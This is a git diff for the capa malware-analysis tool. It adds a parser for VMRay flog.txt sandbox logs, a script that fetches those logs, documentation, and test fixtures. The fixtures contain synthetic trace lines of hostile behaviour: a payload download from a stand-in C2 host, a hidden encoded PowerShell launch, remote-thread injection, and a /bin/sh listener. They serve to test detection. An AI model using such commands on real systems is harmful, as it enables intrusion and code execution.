diff --git a/CHANGELOG.md b/CHANGELOG.md index 316908267..636f86443 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,8 @@ ### New Features - ghidra: support PyGhidra @mike-hunhoff #2788 +- vmray: support parsing flog.txt (Download Function Log) without full ZIP @devs6186 #2452 +- vmray: add flog.txt vs archive docs, fetch-vmray-flog.py helper, and fixture-based regression tests @devs6186 #2878 - vmray: extract number features from whitelisted void_ptr parameters (hKey, hKeyRoot) @adeboyedn #2835 ### Breaking Changes diff --git a/capa/features/extractors/vmray/__init__.py b/capa/features/extractors/vmray/__init__.py index 0eaf0d4c2..a27b9ae1b 100644 --- a/capa/features/extractors/vmray/__init__.py +++ b/capa/features/extractors/vmray/__init__.py @@ -20,13 +20,23 @@ from dataclasses import dataclass from capa.exceptions import UnsupportedFormatError -from capa.features.extractors.vmray.models import File, Flog, SummaryV2, StaticData, FunctionCall, xml_to_dict +from capa.features.extractors.vmray.models import ( + AnalysisMetadata, + File, + FileHashes, + Flog, + FunctionCall, + StaticData, + SummaryV2, + xml_to_dict, +) +from capa.features.extractors.vmray import flog_txt logger = logging.getLogger(__name__) DEFAULT_ARCHIVE_PASSWORD = b"infected" -SUPPORTED_FLOG_VERSIONS = ("2",) +SUPPORTED_FLOG_VERSIONS = ("1", "2") # "1" = flog.txt, "2" = flog.xml @dataclass @@ -132,6 +142,49 @@ def __init__(self, zipfile_path: Path): self._compute_monitor_threads() self._compute_monitor_process_calls() + @classmethod + def from_flog_txt(cls, flog_txt_path: Path) -> "VMRayAnalysis": + """ + Build VMRayAnalysis from a standalone flog.txt file (no ZIP). + Used when only the free "Download Function Log" from VMRay is available. + No submission file or static data; only API trace is available. + """ + self = cls.__new__(cls) + self.zipfile = None + self.flog = flog_txt.parse_flog_txt_path(flog_txt_path) + if self.flog.analysis.log_version not in SUPPORTED_FLOG_VERSIONS: + raise UnsupportedFormatError( + "VMRay feature extractor does not support flog version %s" % self.flog.analysis.log_version + ) + self.sv2 = SummaryV2( + analysis_metadata=AnalysisMetadata( + sample_type="unknown", + submission_filename=flog_txt_path.name, + ), + ) + self.submission_type = "unknown" + self.submission_name = flog_txt_path.name + self.submission_meta = File( + hash_values=FileHashes(md5="0" * 32, sha1="0" * 40, sha256="0" * 64), + is_sample=True, + ref_static_data=None, + ) + self.submission_sha256 = None + self.submission_static = None + self.submission_bytes = b"" + self.submission_base_address = None + self.exports = {} + self.imports = {} + self.sections = {} + self.monitor_processes = {} + self.monitor_threads = {} + self.monitor_threads_by_monitor_process = defaultdict(list) + self.monitor_process_calls = defaultdict(lambda: defaultdict(list)) + self._compute_monitor_processes() + self._compute_monitor_threads() + self._compute_monitor_process_calls() + return self + def _find_sample_file(self): logger.debug("searching archive for submission") diff --git a/capa/features/extractors/vmray/extractor.py b/capa/features/extractors/vmray/extractor.py index 27eeed481..021eb33dc 100644 --- a/capa/features/extractors/vmray/extractor.py +++ b/capa/features/extractors/vmray/extractor.py @@ -150,3 +150,8 @@ def get_call_name(self, ph, th, ch) -> str: @classmethod def from_zipfile(cls, zipfile_path: Path): return cls(VMRayAnalysis(zipfile_path)) + + @classmethod + def from_flog_txt(cls, flog_txt_path: Path): + """Build extractor from a standalone VMRay flog.txt (no ZIP). See #2452.""" + return cls(VMRayAnalysis.from_flog_txt(flog_txt_path)) diff --git a/capa/features/extractors/vmray/flog_txt.py b/capa/features/extractors/vmray/flog_txt.py new file mode 100644 index 000000000..fd341b958 --- /dev/null +++ b/capa/features/extractors/vmray/flog_txt.py @@ -0,0 +1,284 @@ +# Copyright 2024 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""" +Parser for VMRay Function Log text format (flog.txt). + +flog.txt is a free download from VMRay (Threat Feed -> Full Report -> Download Function Log). +Format: header lines starting with "#", then Process: blocks containing Region: and Thread: +blocks. Thread blocks contain API trace lines like: + [0072.750] GetCurrentProcess () returned 0xffffffffffffffff + [0071.184] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1dc + +See: https://github.com/mandiant/capa/issues/2452 +""" + +import re +from pathlib import Path +from typing import Any, Optional + +from capa.exceptions import UnsupportedFormatError +from capa.features.extractors.vmray.models import ( + Analysis, + Flog, + FunctionCall, + MonitorProcess, + MonitorThread, + Param, + Params, +) + +FLOG_TXT_VERSION_HEADER = "# Flog Txt Version 1" + +# Matches name=value argument pairs inside an API call's parentheses. +# value may be: "quoted string" (including escaped chars), 0xHEX, decimal, or other token. +_PARAM_RE = re.compile(r'(\w+)=((?:"(?:[^"\\]|\\.)*")|(?:0x[0-9a-fA-F]+)|(?:\d+)|(?:[^,\s]+))') + + +def _parse_hex_or_decimal(s: str) -> int: + s = s.strip().strip('"') + if not s: + return 0 + if s.lower().startswith("0x"): + return int(s, 16) + return int(s, 10) + + +def _parse_properties(block: str) -> dict[str, Any]: + """Parse key = value lines from a Process/Thread/Region block.""" + result: dict[str, Any] = {} + for line in block.splitlines(): + line = line.strip() + if not line or " = " not in line: + continue + key, _, value = line.partition(" = ") + key = key.strip() + value = value.strip() + if key in ("os_pid", "os_parent_pid", "parent_id", "process_id", "thread_id", "os_tid", "id"): + result[key] = _parse_hex_or_decimal(value) + elif key in ("filename", "image_name", "cmd_line", "monitor_reason"): + result[key] = value.strip('"').replace("\\\\", "\\").strip() + else: + result[key] = value + return result + + +def _parse_args(args_str: str) -> Optional[Params]: + """ + Parse an API call's argument string into a Params object. + + Handles: name="quoted string", name=0xHEX, name=DECIMAL. + String values are modelled as void_ptr + str deref to match the XML extractor convention + so that String features are correctly yielded by the call feature extractor. + Numeric values use type unsigned_32bit so that Number features are yielded. + Symbolic constants (e.g. NULL, TRUE) are skipped; their numeric values are unknown without + header definitions. + + Returns None if no parseable arguments are present. + """ + if not args_str.strip(): + return None + params: list[Param] = [] + for m in _PARAM_RE.finditer(args_str): + name = m.group(1) + raw = m.group(2) + if raw.startswith('"'): + # String value — model as void_ptr with str deref (matches XML extractor convention) + str_val = raw[1:-1] + params.append( + Param.model_validate({"name": name, "type": "void_ptr", "deref": {"type": "str", "value": str_val}}) + ) + elif re.match(r"^0x[0-9a-fA-F]+$", raw) or raw.isdigit(): + # Numeric value — model as integer so Number features are yielded + params.append(Param.model_validate({"name": name, "type": "unsigned_32bit", "value": raw})) + # else: symbolic constant (NULL, INVALID_HANDLE_VALUE, etc.) — skip; value not recoverable + if not params: + return None + return Params.model_validate({"param": params}) + + +def _parse_event(line: str) -> Optional[tuple[str, str, Optional[int]]]: + """ + Parse one API trace line. Returns (api_name, args_str, return_value) or None. + Examples: + [0072.750] GetCurrentProcess () returned 0xffffffffffffffff + [0071.184] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1dc + [0083.567] CoTaskMemFree (pv=0x746aa0) + """ + line = line.strip() + if not line.startswith("["): + return None + # [timestamp] api_name (args) [returned rv] + match = re.match(r"\[\s*(\d+)\.(\d+)\]\s+(\S+)\s*\((.*)\)\s*(?:returned\s+(0x[0-9a-fA-F]+|\d+))?", line) + if not match: + return None + _major, _minor, api_name, args, rv = match.groups() + args = args.strip() if args else "" + return_value: Optional[int] = None + if rv: + return_value = _parse_hex_or_decimal(rv) + return (api_name, args, return_value) + + +def _parse_thread_block( + block: str, thread_props: dict[str, Any] +) -> Optional[tuple[MonitorThread, list[tuple[str, str, Optional[int]]]]]: + """Parse a Thread: block; return MonitorThread and collect events (caller adds them).""" + lines = block.splitlines() + events: list[tuple[str, str, Optional[int]]] = [] + for line in lines: + if line.strip().startswith("["): + ev = _parse_event(line) + if ev: + events.append(ev) + thread_id = thread_props.get("thread_id") or thread_props.get("id") + os_tid = thread_props.get("os_tid", 0) + process_id = thread_props.get("process_id", 0) + if thread_id is None: + return None + # We return the MonitorThread; events are converted to FunctionCalls by the caller + return MonitorThread( + ts=0, + thread_id=int(thread_id), + process_id=int(process_id), + os_tid=int(os_tid) if os_tid else 0, + ), events + + +def _parse_process_block(block: str) -> Optional[tuple[MonitorProcess, list[MonitorThread], list[FunctionCall]]]: + """ + Parse a Process: block. Returns (MonitorProcess, list of MonitorThread, list of FunctionCall) or None. + """ + # Split by Thread: on its own line (allow optional whitespace) + parts = re.split(r"\n\s*Thread:\s*\n", block) + if len(parts) < 2: + return None # no Thread: block found + header_and_regions = parts[0] + thread_blocks = [p.strip() for p in parts[1:] if p.strip()] + + # First part: Process properties then Region: blocks (use regex for robustness) + process_props = _parse_properties(re.split(r"\n\s*Region:\s*\n", header_and_regions)[0]) + process_id = process_props.get("id") or process_props.get("process_id") + if process_id is None: + return None + monitor_process = MonitorProcess( + ts=0, + process_id=int(process_id), + image_name=process_props.get("image_name", "").strip('"') or "unknown", + filename=process_props.get("filename", "").strip('"') or "", + os_pid=process_props.get("os_pid", 0) or 0, + monitor_reason=process_props.get("monitor_reason", "analysis_target").strip('"'), + parent_id=int(process_props.get("parent_id", 0) or 0), + os_parent_pid=int(process_props.get("os_parent_pid", 0) or 0), + cmd_line=process_props.get("cmd_line", "").strip('"') or "", + ) + + threads: list[MonitorThread] = [] + function_calls: list[FunctionCall] = [] + fncall_id = 0 + for thread_block in thread_blocks: + thread_props = _parse_properties(thread_block) + thread_props["process_id"] = process_id + parsed = _parse_thread_block(thread_block, thread_props) + if parsed is None: + continue + mon_thread, events = parsed + threads.append(mon_thread) + for api_name, args_str, rv in events: + fncall_id += 1 + # Strip sys_ prefix for Linux kernel calls (match XML behavior) + if api_name.startswith("sys_"): + api_name = api_name[4:] + # use model_validate because FunctionCall's "in" alias clashes with a Python keyword; + # passing params_in= via __init__ is silently dropped by Pydantic + function_calls.append( + FunctionCall.model_validate( + { + "fncall_id": fncall_id, + "process_id": mon_thread.process_id, + "thread_id": mon_thread.thread_id, + "name": api_name, + "in": _parse_args(args_str), + "out": None, + } + ) + ) + + return (monitor_process, threads, function_calls) + + +def parse_flog_txt(content: str) -> Flog: + """ + Parse flog.txt content into the same Flog (Analysis) model used by the XML path. + """ + # Skip BOM if present; normalize line endings so splits on "Process:\n" / "Thread:\n" work + if content.startswith("\ufeff"): + content = content[1:] + content = content.replace("\r\n", "\n").replace("\r", "\n") + lines = content.splitlines() + # Find end of header (first non-# line) + header_end: Optional[int] = None + for i, line in enumerate(lines): + if line.strip() and not line.strip().startswith("#"): + header_end = i + break + if header_end is None: + header_end = len(lines) + header = "\n".join(lines[:header_end]) + if FLOG_TXT_VERSION_HEADER not in header: + raise UnsupportedFormatError( + "File does not appear to be a VMRay flog.txt (missing '%s')" % FLOG_TXT_VERSION_HEADER + ) + body = "\n".join(lines[header_end:]).strip() + + # Split by "Process:" on its own line (allow optional whitespace) + process_blocks = re.split(r"\n\s*Process:\s*\n", body) + process_blocks = [b.strip() for b in process_blocks if b.strip()] + # If body started with "Process:\n", first element is the only block and starts with "Process:\n" + if not process_blocks and body.strip(): + # No split happened (e.g. body is "Process:\nid=..."), treat whole body as one process block + process_blocks = [body.strip()] + monitor_processes: list[MonitorProcess] = [] + monitor_threads: list[MonitorThread] = [] + function_calls: list[FunctionCall] = [] + + for block in process_blocks: + # First block may start with "Process:\n" when body began with that line + if block.lstrip().startswith("Process:"): + block = block.split("\n", 1)[-1].strip() if "\n" in block else "" + if not block: + continue + result = _parse_process_block(block) + if result is None: + continue # skip malformed process block + mon_process, threads, calls = result + monitor_processes.append(mon_process) + monitor_threads.extend(threads) + function_calls.extend(calls) + + # Use alias names so Pydantic accepts the lists (Analysis model uses alias= for XML compat) + analysis = Analysis( + log_version="1", + analyzer_version="flog.txt", + monitor_process=monitor_processes, + monitor_thread=monitor_threads, + fncall=function_calls, + ) + return Flog(analysis=analysis) + + +def parse_flog_txt_path(path: Path) -> Flog: + """Parse a flog.txt file from disk.""" + text = path.read_text(encoding="utf-8", errors="replace") + return parse_flog_txt(text) diff --git a/capa/helpers.py b/capa/helpers.py index 27c757dcc..ddda8acb5 100644 --- a/capa/helpers.py +++ b/capa/helpers.py @@ -231,6 +231,14 @@ def get_format_from_extension(sample: Path) -> str: format_ = FORMAT_SC32 elif sample.name.endswith(EXTENSIONS_SHELLCODE_64): format_ = FORMAT_SC64 + elif sample.name.endswith("flog.txt"): + # VMRay free "Download Function Log" format (#2452) + try: + header = sample.read_bytes()[:512].decode("utf-8", errors="replace") + if "# Flog Txt Version 1" in header: + format_ = FORMAT_VMRAY + except (OSError, UnicodeDecodeError): + pass elif sample.name.endswith(EXTENSIONS_DYNAMIC): format_ = get_format_from_report(sample) elif sample.name.endswith(EXTENSIONS_FREEZE): @@ -307,9 +315,10 @@ def log_unsupported_vmray_report_error(error: str): logger.error(" Input file is not a valid VMRay analysis archive: %s", error) logger.error(" ") logger.error( - " capa only supports analyzing VMRay dynamic analysis archives containing summary_v2.json and flog.xml log files." + " capa supports analyzing VMRay dynamic analysis archives (containing summary_v2.json and flog.xml)" ) - logger.error(" Please make sure you have downloaded a dynamic analysis archive from VMRay.") + logger.error(" or a standalone VMRay function log (flog.txt, via Threat Feed -> Full Report -> Download Function Log).") + logger.error(" Please make sure you have downloaded a supported VMRay report.") logger.error("-" * 80) diff --git a/capa/loader.py b/capa/loader.py index d89d4c09f..88a159af3 100644 --- a/capa/loader.py +++ b/capa/loader.py @@ -236,6 +236,8 @@ def get_extractor( elif backend == BACKEND_VMRAY: import capa.features.extractors.vmray.extractor + if input_path.name.endswith("flog.txt"): + return capa.features.extractors.vmray.extractor.VMRayExtractor.from_flog_txt(input_path) return capa.features.extractors.vmray.extractor.VMRayExtractor.from_zipfile(input_path) elif backend == BACKEND_DOTNET: @@ -491,7 +493,14 @@ def get_file_extractors(input_file: Path, input_format: str) -> list[FeatureExtr elif input_format == FORMAT_VMRAY: import capa.features.extractors.vmray.extractor - file_extractors.append(capa.features.extractors.vmray.extractor.VMRayExtractor.from_zipfile(input_file)) + if input_file.name.endswith("flog.txt"): + file_extractors.append( + capa.features.extractors.vmray.extractor.VMRayExtractor.from_flog_txt(input_file) + ) + else: + file_extractors.append( + capa.features.extractors.vmray.extractor.VMRayExtractor.from_zipfile(input_file) + ) elif input_format == FORMAT_BINEXPORT2: file_extractors = _get_binexport2_file_extractors(input_file) diff --git a/doc/usage.md b/doc/usage.md index 6a207ed6f..d3ccfa8fd 100644 --- a/doc/usage.md +++ b/doc/usage.md @@ -2,10 +2,50 @@ See `capa -h` for all supported arguments and usage examples. +## Ways to consume capa output + +| Option | Description | Typical use | +|--------|-------------|-------------| +| **CLI** | `capa` on the command line | Scripting, CI/CD, one-off analysis | +| [**IDA Pro**](https://github.com/mandiant/capa/tree/master/capa/ida/plugin) | capa Explorer plugin inside IDA | Interactive analysis with jump-to-address | +| [**Ghidra**](https://github.com/mandiant/capa/tree/master/capa/ghidra/plugin) | capa Explorer plugin inside Ghidra | Interactive analysis with Ghidra integration | +| [**CAPE**](https://www.mandiant.com/resources/blog/dynamic-capa-executable-behavior-cape-sandbox) | capa run on sandbox report (e.g. CAPE, VMRay ZIP or VMRay flog.txt) | Dynamic analysis of sandbox output | +| [**Web (capa Explorer)**](https://mandiant.github.io/capa/explorer/) | Web UI (upload JSON or load from URL) | Sharing results, viewing from VirusTotal or similar | + ## Default vs verbose output By default, capa shows only *top-level* rule matches: capabilities that are not already implied by another displayed rule. For example, if a rule "persist via Run registry key" matches and it *contains* a match for "set registry value", the default output lists only "persist via Run registry key". This keeps the default output short while still reflecting all detected capabilities at the top level. Use **`-v`** to see all rule matches, including nested ones. Use **`-vv`** for an even more detailed view that shows how each rule matched. +## VMRay: flog.txt vs full analysis archive + +When analysing VMRay output you can give capa either the full analysis **ZIP archive** or just the **flog.txt** function-log file. +Choose based on what you have access to and what features you need. + +| | **flog.txt** (free, "Download Function Log") | **Full VMRay ZIP archive** | +|-|-|-| +| **How to obtain** | VMRay Threat Feed → Full Report → *Download Function Log* | Purchased subscription; *Download Analysis Archive* | +| **File size** | Small text file | Large encrypted ZIP | +| **Dynamic API calls** | ✓ | ✓ | +| **String arguments** | ✓ (parsed from text) | ✓ (from structured XML) | +| **Numeric arguments** | ✓ (parsed from text) | ✓ (from structured XML) | +| **Static imports / exports** | ✗ | ✓ | +| **PE/ELF section names** | ✗ | ✓ | +| **Embedded file strings** | ✗ | ✓ | +| **Base address** | ✗ | ✓ | +| **Argument names** | ✓ (text-format `name=value`) | ✓ (structured XML) | + +**When to use flog.txt:** You only have access to VMRay Threat Feed without a full subscription, or you want a quick first pass using only the freely-available function log. + +**When to use the full archive:** You need static features (imports, exports, strings, section names) in addition to dynamic behaviour, or you want the highest-fidelity argument data. + +``` +# flog.txt — free, limited to dynamic API calls +capa path/to/flog.txt + +# Full VMRay archive — requires subscription, richer features +capa path/to/analysis_archive.zip +``` + ## tips and tricks ### only run selected rules diff --git a/scripts/fetch-vmray-flog.py b/scripts/fetch-vmray-flog.py new file mode 100644 index 000000000..e9859056d --- /dev/null +++ b/scripts/fetch-vmray-flog.py @@ -0,0 +1,270 @@ +#!/usr/bin/env python3 +# Copyright 2025 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""" +Fetch the VMRay Function Log (flog.txt) for a sample and optionally run capa against it. + +Given a sample SHA-256 hash and VMRay credentials, this script: + 1. Looks up the sample on the VMRay instance. + 2. Finds the most-recent analysis for that sample. + 3. Downloads the flog.txt (Download Function Log) from the analysis archive. + 4. Optionally runs capa against the downloaded file. + +Requirements: + pip install requests + +Usage:: + + python scripts/fetch-vmray-flog.py \\ + --url https://your-vmray.example.com \\ + --apikey YOUR_API_KEY \\ + --sha256 d46900384c78863420fb3e297d0a2f743cd2b6b3f7f82bf64059a168e07aceb7 \\ + --output /tmp/sample_flog.txt + + # Fetch and immediately run capa: + python scripts/fetch-vmray-flog.py \\ + --url https://your-vmray.example.com \\ + --apikey YOUR_API_KEY \\ + --sha256 d46900384c78863420fb3e297d0a2f743cd2b6b3f7f82bf64059a168e07aceb7 \\ + --run-capa + +VMRay API reference: + https://docs.vmray.com/documents/api-reference/ + +Note: this script requires a VMRay account. The flog.txt itself is freely available +("Download Function Log") in the VMRay Threat Feed web UI, but downloading it +programmatically via the REST API requires valid API credentials. +""" + +import argparse +import logging +import subprocess +import sys +from pathlib import Path + +import requests + +logger = logging.getLogger(__name__) + +# --------------------------------------------------------------------------- +# VMRay REST API helpers +# --------------------------------------------------------------------------- + +_FLOG_TXT_ARCHIVE_PATH = "logs/flog_txt" + + +def _session(url: str, apikey: str) -> requests.Session: + """Return an authenticated requests.Session for the given VMRay instance.""" + s = requests.Session() + s.headers.update( + { + "Authorization": f"api_key {apikey}", + "Accept": "application/json", + } + ) + s.verify = True # set to False only when using self-signed certificates + s.base_url = url.rstrip("/") # type: ignore[attr-defined] + return s + + +def _get(session: requests.Session, path: str, **kwargs) -> dict: + url = f"{session.base_url}{path}" # type: ignore[attr-defined] + resp = session.get(url, **kwargs) + resp.raise_for_status() + return resp.json() + + +def _get_bytes(session: requests.Session, path: str, **kwargs) -> bytes: + url = f"{session.base_url}{path}" # type: ignore[attr-defined] + resp = session.get(url, **kwargs) + resp.raise_for_status() + return resp.content + + +def lookup_sample(session: requests.Session, sha256: str) -> dict: + """ + Return the VMRay sample record for the given SHA-256. + Raises ValueError if the sample is not found. + """ + data = _get(session, f"/rest/sample/sha256/{sha256}") + if data.get("result") != "ok" or not data.get("data"): + raise ValueError(f"sample not found on VMRay instance: {sha256}") + # data["data"] is a list; take the first entry + return data["data"][0] + + +def get_latest_analysis(session: requests.Session, sample_id: int) -> dict: + """ + Return the most-recent finished analysis for the given VMRay sample ID. + Raises ValueError if no analysis is found. + """ + data = _get(session, "/rest/analysis", params={"sample_id": sample_id}) + analyses = data.get("data", []) + if not analyses: + raise ValueError(f"no analyses found for sample_id={sample_id}") + # Sort by analysis_id descending (newest first) + analyses.sort(key=lambda a: a.get("analysis_id", 0), reverse=True) + return analyses[0] + + +def download_flog_txt(session: requests.Session, analysis_id: int) -> bytes: + """ + Download the flog.txt content for the given VMRay analysis ID. + + VMRay exposes the function log via the analysis archive endpoint. + We request only the flog_txt entry from the archive using the + ``file_filter`` query parameter. + """ + # Try the dedicated log endpoint first (VMRay >= 2024.x) + try: + content = _get_bytes( + session, + f"/rest/analysis/{analysis_id}/export/v2/logs/flog_txt/binary", + ) + if content: + return content + except requests.HTTPError: + pass + + # Fallback: download via the analysis archive with a file filter + content = _get_bytes( + session, + f"/rest/analysis/{analysis_id}/archive", + params={"file_filter[]": _FLOG_TXT_ARCHIVE_PATH}, + ) + return content + + +# --------------------------------------------------------------------------- +# main +# --------------------------------------------------------------------------- + + +def main(argv=None): + if argv is None: + argv = sys.argv[1:] + + parser = argparse.ArgumentParser( + description="Download VMRay flog.txt for a sample hash and (optionally) run capa." + ) + parser.add_argument( + "--url", + required=True, + metavar="URL", + help="Base URL of your VMRay instance, e.g. https://cloud.vmray.com", + ) + parser.add_argument( + "--apikey", + required=True, + metavar="KEY", + help="VMRay REST API key (Settings → API Keys).", + ) + parser.add_argument( + "--sha256", + required=True, + metavar="SHA256", + help="SHA-256 hash of the sample to analyse.", + ) + parser.add_argument( + "--output", + metavar="PATH", + help="Where to save the downloaded flog.txt. Defaults to _flog.txt in the current directory.", + ) + parser.add_argument( + "--run-capa", + action="store_true", + dest="run_capa", + help="After downloading, run 'capa ' and print the results.", + ) + parser.add_argument( + "--capa-args", + metavar="ARGS", + default="", + help="Extra arguments forwarded to capa (only used with --run-capa).", + ) + parser.add_argument( + "--no-verify-ssl", + action="store_false", + dest="verify_ssl", + help="Disable SSL certificate verification (useful for on-premise instances with self-signed certs).", + ) + parser.add_argument( + "-d", "--debug", action="store_true", help="Enable debug logging." + ) + args = parser.parse_args(argv) + + logging.basicConfig( + level=logging.DEBUG if args.debug else logging.INFO, + format="%(levelname)s: %(message)s", + ) + + output_path = Path(args.output) if args.output else Path(f"{args.sha256}_flog.txt") + + session = _session(args.url, args.apikey) + session.verify = args.verify_ssl # type: ignore[assignment] + + # Step 1 — look up sample + logger.info("looking up sample %s …", args.sha256) + try: + sample = lookup_sample(session, args.sha256) + except (requests.HTTPError, ValueError) as exc: + logger.error("failed to find sample: %s", exc) + return 1 + + sample_id: int = sample["sample_id"] + logger.debug("found sample_id=%d", sample_id) + + # Step 2 — find the latest analysis + logger.info("fetching analysis list for sample_id=%d …", sample_id) + try: + analysis = get_latest_analysis(session, sample_id) + except (requests.HTTPError, ValueError) as exc: + logger.error("failed to find analysis: %s", exc) + return 1 + + analysis_id: int = analysis["analysis_id"] + logger.debug("using analysis_id=%d", analysis_id) + + # Step 3 — download flog.txt + logger.info("downloading flog.txt for analysis_id=%d …", analysis_id) + try: + flog_bytes = download_flog_txt(session, analysis_id) + except requests.HTTPError as exc: + logger.error("failed to download flog.txt: %s", exc) + return 1 + + if not flog_bytes: + logger.error( + "received empty response — flog.txt may not be available for this analysis" + ) + return 1 + + output_path.write_bytes(flog_bytes) + logger.info("saved flog.txt → %s (%d bytes)", output_path, len(flog_bytes)) + + # Step 4 (optional) — run capa + if args.run_capa: + capa_cmd = ["capa", str(output_path)] + ( + args.capa_args.split() if args.capa_args else [] + ) + logger.info("running: %s", " ".join(capa_cmd)) + result = subprocess.run(capa_cmd) + return result.returncode + + return 0 + + +if __name__ == "__main__": + sys.exit(main()) diff --git a/tests/fixtures/vmray/flog_txt/linux_syscalls.flog.txt b/tests/fixtures/vmray/flog_txt/linux_syscalls.flog.txt new file mode 100644 index 000000000..0b9455cc6 --- /dev/null +++ b/tests/fixtures/vmray/flog_txt/linux_syscalls.flog.txt @@ -0,0 +1,43 @@ +# Log Creation Date: 02.01.2025 12:00:00 +# Analyzer Version: 2024.4.1 +# Flog Txt Version 1 + +Process: +id = "1" +os_pid = "0x1234" +os_parent_pid = "0x1" +parent_id = "0" +image_name = "backdoor" +filename = "/tmp/backdoor" +cmd_line = "/tmp/backdoor" +monitor_reason = "analysis_target" + +Region: +id = "1" +name = "stack" + +Thread: +id = "1" +os_tid = "0x1234" + [0001.000] sys_read (fd=0x3, buf=0x7ffe1234, count=0x1000) returned 0x100 + [0001.001] sys_write (fd=0x1, buf=0x7ffe1234, count=0x6) returned 0x6 + [0001.002] sys_open (pathname="/etc/passwd", flags=0x0, mode=0x0) returned 0x3 + [0001.003] sys_connect (sockfd=0x4, addr=0x7ffe2000, addrlen=0x10) returned 0x0 + [0001.004] sys_socket (domain=0x2, type=0x1, protocol=0x0) returned 0x4 + [0001.005] sys_execve (filename="/bin/sh", argv=0x7ffe3000, envp=0x7ffe4000) returned 0x0 + [0001.006] sys_fork () returned 0x2345 + [0001.007] sys_getuid () returned 0x0 + [0001.008] sys_setuid (uid=0x0) returned 0x0 + [0001.009] sys_chmod (pathname="/tmp/backdoor", mode=0x1ed) returned 0x0 + [0001.010] sys_unlink (pathname="/tmp/.hidden") returned 0x0 + [0001.011] sys_time (tloc=0x0) returned 0x677f2000 + [0001.012] sys_ptrace (request=0x0, pid=0x1, addr=0x0, data=0x0) returned 0x0 + [0001.013] sys_prctl (option=0xf, arg2=0x0, arg3=0x0, arg4=0x0, arg5=0x0) returned 0x0 + [0001.014] sys_mmap (addr=0x0, length=0x1000, prot=0x7, flags=0x22, fd=0xffffffff, offset=0x0) returned 0x7f0000 + [0001.015] sys_mprotect (start=0x7f0000, len=0x1000, prot=0x5) returned 0x0 + [0001.016] sys_munmap (addr=0x7f0000, length=0x1000) returned 0x0 + [0001.017] sys_bind (sockfd=0x4, addr=0x7ffe2000, addrlen=0x10) returned 0x0 + [0001.018] sys_listen (sockfd=0x4, backlog=0x5) returned 0x0 + [0001.019] sys_accept (sockfd=0x4, addr=0x7ffe2010, addrlen=0x7ffe2020) returned 0x5 + [0001.020] sys_sendto (sockfd=0x5, buf=0x7ffe5000, len=0x20, flags=0x0, dest_addr=0x0, addrlen=0x0) returned 0x20 + [0001.021] sys_recvfrom (sockfd=0x5, buf=0x7ffe5000, len=0x1000, flags=0x0) returned 0x40 diff --git a/tests/fixtures/vmray/flog_txt/string_edge_cases.flog.txt b/tests/fixtures/vmray/flog_txt/string_edge_cases.flog.txt new file mode 100644 index 000000000..0948939b0 --- /dev/null +++ b/tests/fixtures/vmray/flog_txt/string_edge_cases.flog.txt @@ -0,0 +1,37 @@ +# Log Creation Date: 03.01.2025 08:00:00 +# Analyzer Version: 2024.4.1 +# Flog Txt Version 1 + +Process: +id = "1" +os_pid = "0x2000" +os_parent_pid = "0x4" +parent_id = "0" +image_name = "edgecase.exe" +filename = "c:\\users\\test\\edgecase.exe" +cmd_line = "edgecase.exe" +monitor_reason = "analysis_target" + +Region: +id = "5" +name = "private_0x0000000000010000" + +Thread: +id = "1" +os_tid = "0x2100" + [0001.000] GetCurrentProcess () returned 0xffffffffffffffff + [0001.001] CreateFileW (lpFileName="C:\\path with spaces\\file name.txt", dwDesiredAccess=0x40000000) returned 0x8 + [0001.002] RegOpenKeyExW (hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019) returned 0x0 + [0001.003] CreateFileW (lpFileName="\\\\server\\share\\document.docx", dwDesiredAccess=0x80000000) returned 0x9 + [0001.004] CreateFileW (lpFileName="", dwDesiredAccess=0x80000000) returned 0xffffffffffffffff + [0001.005] OutputDebugStringA (lpOutputString="debug: value=0x1234 status=ok") returned 0x0 + [0001.006] MessageBoxW (hWnd=0x0, lpText="An error occurred.\nPlease try again.", lpCaption="Error", uType=0x10) returned 0x1 + [0001.007] SetEnvironmentVariableW (lpName="PATH", lpValue="C:\\Windows\\system32;C:\\Windows") returned 0x1 + [0001.008] URLDownloadToFileW (pCaller=0x0, szURL="https://c2.example.com/payload.bin", szFileName="C:\\Users\\test\\AppData\\Local\\Temp\\payload.bin", dwReserved=0x0) returned 0x0 + [0001.009] CryptHashData (hHash=0x100, pbData=0x1234, dwDataLen=4096, dwFlags=0x0) returned 0x1 + [0001.010] connect (s=0x4, name=0x7ffe2000, namelen=0x10) returned 0x0 + [0001.011] send (s=0x4, buf=0x7ffe5000, len=256, flags=0x0) returned 256 + [0001.012] recv (s=0x4, buf=0x7ffe5000, len=4096, flags=0x0) returned 128 + [0001.013] CreateProcessW (lpApplicationName=NULL, lpCommandLine="powershell.exe -nop -w hidden -enc BASE64PAYLOAD", dwCreationFlags=0x8000000) returned 0x1 + [0001.014] WriteProcessMemory (hProcess=0xffffffffffffffff, lpBaseAddress=0x140001000, lpBuffer=0x1000, nSize=4096) returned 0x1 + [0001.015] CreateRemoteThread (hProcess=0xffffffffffffffff, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x140001000, lpParameter=0x0, dwCreationFlags=0x0) returned 0x200 diff --git a/tests/fixtures/vmray/flog_txt/windows_apis.flog.txt b/tests/fixtures/vmray/flog_txt/windows_apis.flog.txt new file mode 100644 index 000000000..e7cab248a --- /dev/null +++ b/tests/fixtures/vmray/flog_txt/windows_apis.flog.txt @@ -0,0 +1,63 @@ +# Log Creation Date: 01.01.2025 10:00:00 +# Analyzer Version: 2024.4.1 +# Flog Txt Version 1 + +Process: +id = "1" +os_pid = 